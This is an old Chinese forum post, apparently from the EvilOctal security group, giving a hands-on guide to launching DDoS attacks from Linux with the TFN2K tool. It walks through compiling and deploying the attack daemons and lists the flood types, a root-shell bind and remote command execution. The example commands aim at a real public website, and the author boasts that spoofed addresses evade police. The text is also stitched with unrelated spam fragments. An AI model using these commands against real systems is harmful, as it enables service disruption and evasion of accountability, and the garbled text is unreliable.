使用LINUX系统DDOS攻击WINDOWS服务器.txt——某天你一定会感谢那个遗弃你的人,感谢那个你曾深爱着却置之你不顾的人。做一个没心没肺的人,比什么都强。________舍不得又怎样到最后还不是说散就散。[原创]使用LINUX系统DDOS攻击WINDOWS服务器文章标题:[原创]使用LINUX系统DDOS攻击WINDOWS服务器顶部man776578发布于:2005-04-1517:24 [楼主][原创]使用LINUX系统DDOS攻击WINDOWS服务器文章作者:施陶芬贝格信息来源:邪恶八进制安全小组安全说的多了,说说攻击吧,作为本论坛的新人,请大家指正首先说我们用来攻击的客户机和服务器的配置方法,使用当下最有名的REDHATLINUX进行测试,本次攻击测试我使用的是FEDORACORE3,软件用的是最有名的DDOS攻击工具TFN2KLINUX版,被攻击的WINDOWS服务器系统使用的是WINDOWS2000SERVER服务开有APACHE2FTPVNC关系不大,主要攻击APACHE废话不说了,开始设置服务器.0.解压tar-zxvftfn2k.tgz1.安装TFN2KTFN2K为开放原代码的软件,所以需要我们进行编译,这个不用说了,编译应该都会的吧,但有几个地方是必需注意的,因为使用不同版本和厂商的LINUX需要不同的设置.先修改src/ip.h注释掉以下部分,否则编译出错。/*structin_addr{unsignedlongints_addr;};*/然后make进行编译编译时会提示你输入服务器端进行密码设置8-32位,(攻击的时候需要输入密码)编译后会出现两个新的执行文件td和tfn,其中td是守护进程,也是客户机的使用进程,而tfn是服务器控制进程,如果想攻击别人就必需先起动td这个进程,然后再运行服务器进程,否则攻击无效,更改密码可以执行mkpass进行更改,最后在所有的客户机中安装并运行td(需要ROOT权限),并且在服务器上建立一个文本文件,文件中
记录
混凝土 养护记录下载土方回填监理旁站记录免费下载集备记录下载集备记录下载集备记录下载
所有的客户机IP地址(用VI编辑一个就可行了),
格式
pdf格式笔记格式下载页码格式下载公文格式下载简报格式下载
为:192.168.0.1192.168.0.2192.168.0.3IPIP.....然后在主服务器上运行./tfn2.攻击./tfn直接回车大家可以看到一些参数,英文好的朋友估计不用我来多讲了:)格式./tfn<参数>无用的参数我们不提,我们来说攻击用的-f这个参数后面跟刚才所写的文本文件名,就是真正实现DDOS攻击,而不是DOS-hDOS攻击,也就是单机,一对一的攻击后面跟一个主机或IP地址-p后面指定一个端口,不用说了-c最关键的参数,一共有11个选相0-停止攻击,发善心用的1-反欺骗等级设定,因为TFN这个工具在攻击的时候所发出的数据包是带有源地址的,但是源地址是随机的,也就是说地址不是你自给的,所以不用担心C0P抓,哈哈2-改编数据包的包尺寸:缺省的ICMP/8,smurf,udp攻击缺省使用最小包。你可以通过改变每个包的有效载荷的字节增加它的大小。3 - 绑定root shell:启动一个会话服务,然后你连接一个指定端口就可以得到一个rootshell。4 - UDP洪水攻击:这个攻击是利用这样一个事实:每个udp包被送往一个关闭的端口,这样就会有一个ICMP不可到达的信息返回,增加了攻击的能力。5 - SYN洪水攻击:这个攻击有规律的送虚假的连接请求。结果会是目标端口拒绝服务,添瞒TCP连接表,通过对不存在主机的TCP/RST响应增加攻击潜力,是
标准
excel标准偏差excel标准偏差函数exl标准差函数国标检验抽样标准表免费下载红头文件格式标准下载
的拒绝服务攻击.6 - ICMP响应(ping)攻击:这个攻击发送虚假地址的ping请求,目标主机会回送相同大小的响应包。7-SMURF攻击:用目标主机的地址发送ping请求以广播扩大,这样目标主机将得到回复一个多倍的回复。8 - MIX攻击:按照1:1:1的关系交替的发送udp,syn,icmp包,这样就可以对付路由器,其它包转发设备,NIDS,sniffers等,轮番轰炸:)9 -TARGA3攻击10 - 远程命令执行,这个参数是TFN的附加功能,其实TFN的攻击不仅仅是DOS,还可以远程的进行明令控制,如:./tfn-fhostext-c10-i"mkdir/root/edison"在所有的HOST上root家目录建立edison,-i后面跟"命令"参数基本说完,下面攻击./tfn-fhostext-c4-iwww.163.com使用hostext文件中记录的主机对163服务器进行UDP攻击(所有的主机中必需已经起动td进程)./tfn-fhostext-c5-iwww.163.com-p80使用hostext文件中记录的主机对163服务器进行TCP拒绝服务攻击(80攻击WEB,其他不用说了)./tfn-fhostext-c6-iwww.163.com使用hostext文件中记录的主机对163服务器进行ICMP攻击(PING攻击,缓冲区溢出马上死机)./tfn-fhostext-c8-iwww.163.com使用hostext文件中记录的主机对163服务器进行ICMP&TCP&UDP轮番攻击(如果对方是sniffer一定哭死)./tfn-fhostext-c0让所由主机停止攻击基本说完,最后说说我的测试结果一对一攻击,攻击方式TCP连接方式本地本地CPU13%被攻击的服务器CPU使用率70%以上,并时时波动二对一攻击,攻击方式TCP连接方式本地本地单机CPU13%被攻击的服务器CPU使用率100%五对一攻击,攻击方式TCP连接方式本地本地单机CPU13%被攻击的服务器死机本人家里只有6台机器,但如果再多点,几十台机器,一般的个人服务器肯定要死掉了一对一攻击,攻击方式ICMP连接方式本地本地CPU18%被攻击的服务器CPU使用率96%以上,并时时波动二对一攻击,攻击方式ICMP连接方式本地本地单机CPU18%被攻击的服务器以经无法上网,几乎无法使用,半小时内死机看来威力不小,请个位手下留情啊:P[此贴被EvilOctal在2005-04-1517:40重新编辑](c)Copyleft2003-2007,EvilOctalSecurityTeam.ThisfileisdecompiledbyanunregisteredversionofChmDecompiler.Regsiteredversiondoesnotshowthismessage.YoucandownloadChmDecompilerat:
浙公网安备 33021202002483